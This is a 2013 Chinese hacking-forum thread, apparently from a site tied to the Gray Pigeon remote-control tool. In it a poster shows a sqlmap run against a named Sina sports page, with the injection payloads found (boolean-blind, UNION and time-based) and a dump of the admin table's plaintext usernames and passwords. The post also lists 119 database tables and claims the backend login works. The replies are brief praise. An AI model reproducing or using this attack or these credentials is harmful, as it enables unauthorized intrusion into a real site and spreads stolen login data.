灰鸽子远程控制软件

 找回密码
 立即注册

QQ登录

只需一步,快速开始

查看: 20131|回复: 9

新浪的一个Sql注入,可进入拿后台

[复制链接]
发表于 2013-8-9 22:16:04 | 显示全部楼层 |阅读模式
root@kali:~# sqlmap -u "http://others.sports.sina.com.cn/cva/paper.php?id=264" --dump -C "Manager,PassWord" -T "cva_manager" -D "otherssports"
新浪的一个Sql注入,可进入拿后台
注入新浪.jpg

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool

    http://sqlmap.org



[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program


  starting at 18:10:41



[18:10:41] [INFO] resuming back-end DBMS 'mysql'

[18:10:41] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: id

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: id=264') AND 5215=5215 AND ('eOJb'='eOJb



    Type: UNION query

    Title: MySQL UNION query (NULL) - 36 columns

    Payload: id=-7030') UNION ALL SELECT CONCAT(0x3a786c763a,0x424f4778474d484c6157,0x3a63707a3a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#



    Type: AND/OR time-based blind

    Title: MySQL > 5.0.11 AND time-based blind

    Payload: id=264') AND SLEEP(5) AND ('grRQ'='grRQ

---
QQ截图20133333.jpg
[18:10:42] [INFO] the back-end DBMS is MySQL

web application technology: Apache

back-end DBMS: MySQL 5.0.11

[18:10:42] [INFO] fetching columns 'Manager, PassWord' for table 'cva_manager' in database 'otherssports'

[18:10:42] [INFO] the SQL query used returns 2 entries

[18:10:42] [INFO] retrieved: "Manager","varchar(20)"

[18:10:42] [INFO] retrieved: "PassWord","varchar(20)"

[18:10:42] [INFO] fetching entries of column(s) 'Manager, PassWord' for table 'cva_manager' in database 'otherssports'

[18:10:42] [INFO] the SQL query used returns 2 entries

[18:10:42] [INFO] retrieved: "cva","fgrtert$4b345b"

[18:10:43] [INFO] retrieved: "cvadmin","fdgest34534sdftt54dg"

[18:10:43] [INFO] analyzing table dump for possible password hashes            

Database: otherssports

Table: cva_manager

[2 entries]

+---------+----------------------+

| Manager | PassWord             |

+---------+----------------------+

| cva     | fgrtert$4b345b       |

| cvadmin | fdgest34534sdftt54dg |

+---------+----------------------+




web application technology: Apache

back-end DBMS: MySQL 5.0.11

[18:06:26] [INFO] fetching tables for database: 'otherssports'

[18:06:26] [INFO] the SQL query used returns 119 entries

Database: otherssports                                                         

[119 tables]

+------------------------------+

| admins                       |

| admins1                      |

| cba_double                   |

| cba_member                   |

| cba_member_info              |

| cba_result                   |

| cba_result_data              |

| cba_result_team              |

| chels_fixture                |

| chels_mail                   |

| chels_news                   |

| chels_picture                |

| chels_player                 |

| chels_player_club            |

| chels_player_season          |

| chels_score                  |

| chels_user                   |

| chels_word                   |

| countrystatisticmedal        |

| cva_area                     |

| cva_groups                   |

| cva_league                   |

| cva_manager                  |

| cva_match                    |

| cva_match_0809               |

| cva_match_0910               |

| cva_match_bak                |

| cva_member                   |

| cva_member_0809              |

| cva_member_0910              |

| cva_member_bak               |

| cva_para                     |

| cva_result                   |

| cva_result_0809              |

| cva_result_0910              |

| cva_result_bak               |

| cva_team                     |

| cva_team_0809                |

| cva_team_0910                |

| cva_team_bak                 |

| doha_country                 |

| doha_member                  |

| doha_result                  |

| doha_sports                  |

| dpool_check_db               |

| fivb_chinese                 |

| fivb_match                   |

| fivb_playerorder             |

| fivb_playerorder_1           |

| fivb_rank                    |

| football_news                |

| goaltv_login                 |

| guess_answer                 |

| guess_news                   |

| guess_question               |

| guess_title                  |

| guess_user                   |

| guess_user_ans               |

| head_2_head                  |

| head_player                  |

| historymedal                 |

| historymedal_bak             |

| historymedal_copy            |

| historymedalteam             |

| iaaf_match                   |

| iaaf_record                  |

| iaaf_result                  |

| inter_allscore               |

| inter_chinese                |

| inter_match                  |

| inter_news                   |

| inter_pic                    |

| inter_player                 |

| inter_playerinfo             |

| inter_user                   |

| ittf_live                    |

| ittf_player                  |

| key_channel                  |

| key_record                   |

| key_word_url                 |

| live_photo                   |

| live_sports                  |

| match                        |

| match_score                  |

| match_team                   |

| match_type                   |

| mix_children_record          |

| mix_children_user            |

| personstatisticmedal         |

| rank_atp                     |

| rank_atp_d                   |

| rank_atp_date                |

| rank_atp_prize               |

| rank_bmf                     |

| rank_bmf_d                   |

| rank_bmf_date                |

| rank_cttsl                   |

| rank_fifa                    |

| rank_golf                    |

| rank_ittf                    |

| rank_link                    |

| rank_word                    |

| rank_wta                     |

| rank_wta_d                   |

| rank_wta_date                |

| rank_wta_prize               |

| record_swimming              |

| record_swimming_bak_20110106 |

| reporter_user                |

| shidefc_user                 |

| team_player                  |

| tennis_live                  |

| tennis_match                 |

| tennis_news                  |

| tennis_player                |

| tennis_schedual              |

| tennis_user                  |

| tennis_user_match            |

| tennis_user_player           |

+------------------------------+


测试可以成功进入后台
评帖赚银币(0) 收起
回复

使用道具 举报

发表于 2013-8-13 18:30:19 | 显示全部楼层
不错 学习了
评帖赚银币(0) 收起
回复 支持 反对

使用道具 举报

发表于 2013-8-14 10:48:49 | 显示全部楼层
不错不错不错不错不错学习一下
评帖赚银币(0) 收起
回复 支持 反对

使用道具 举报

发表于 2013-8-30 15:22:57 | 显示全部楼层
不错不错不错不错不错学习一下
评帖赚银币(0) 收起
回复 支持 反对

使用道具 举报

发表于 2013-8-31 10:21:57 | 显示全部楼层
楼主用的是什么扫描器?
评帖赚银币(0) 收起
回复 支持 反对

使用道具 举报

发表于 2013-11-14 16:07:11 | 显示全部楼层
aaaaaaaaaaaaaaaaaaaaaaaaaaaaa
评帖赚银币(0) 收起
回复 支持 反对

使用道具 举报

发表于 2013-11-17 17:44:07 | 显示全部楼层
天啊  一点都看不懂 我真是菜鸟得不能再菜鸟了··
评帖赚银币(0) 收起
回复 支持 反对

使用道具 举报

发表于 2013-12-17 17:40:17 | 显示全部楼层
好  真好   我想下
评帖赚银币(0) 收起
回复 支持 反对

使用道具 举报

发表于 2013-12-24 19:09:51 | 显示全部楼层
好深奥啊。我是来拿分的!
评帖赚银币(0) 收起
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|灰鸽子远程控制软件|灰鸽子远程控制软件 ( 鲁ICP备14000061号-4 )

GMT+8, 2024-11-23 03:06 , Processed in 0.080342 second(s), 42 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表